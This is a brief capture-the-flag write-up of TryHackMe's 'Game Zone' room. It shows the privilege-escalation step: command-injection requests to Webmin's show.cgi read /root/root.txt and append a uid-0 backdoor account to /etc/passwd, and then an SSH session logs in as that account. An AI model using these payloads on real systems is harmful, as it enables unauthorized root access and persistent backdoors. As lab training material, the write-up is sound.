Game Zone

Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!

This is Game Zone from THM. It’s easy rated and effectively a walk through. I won’t say much about it.

Privesc

You reach a point where you’ve got access to a Webmin login with some creds; the instructions want you to use Metasploit:

Using the CMS dashboard version, use Metasploit to find a payload to execute against the machine.

Nah, brah. We can read the root flag or add root2 to the system just fine without MSF. Once you’ve logged in, Burp Suite will do:

GET /file/show.cgi/bin/asdsaasd|cat /root/root.txt| HTTP/1.1

Then, just for kicks:

GET /file/show.cgi/bin/asdsaasd|echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd| HTTP/1.1

root@kali:/opt/tryhackme/gamezone# ssh root2@10.10.243.157
root2@10.10.243.157s password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.


Last login: Fri Aug 16 17:48:48 2019 from 192.168.1.147
root@gamezone:~# cd /root
root@gamezone:~# ls -lash
total 24K
4.0K drwx------  3 root root 4.0K Aug 16  2019 .
4.0K drwxr-xr-x 23 root root 4.0K Aug 16  2019 ..
   0 lrwxrwxrwx  1 root root    9 Aug 16  2019 .bash_history -> /dev/null
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwx------  2 root root 4.0K Aug 16  2019 .cache
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   33 Aug 16  2019 root.txt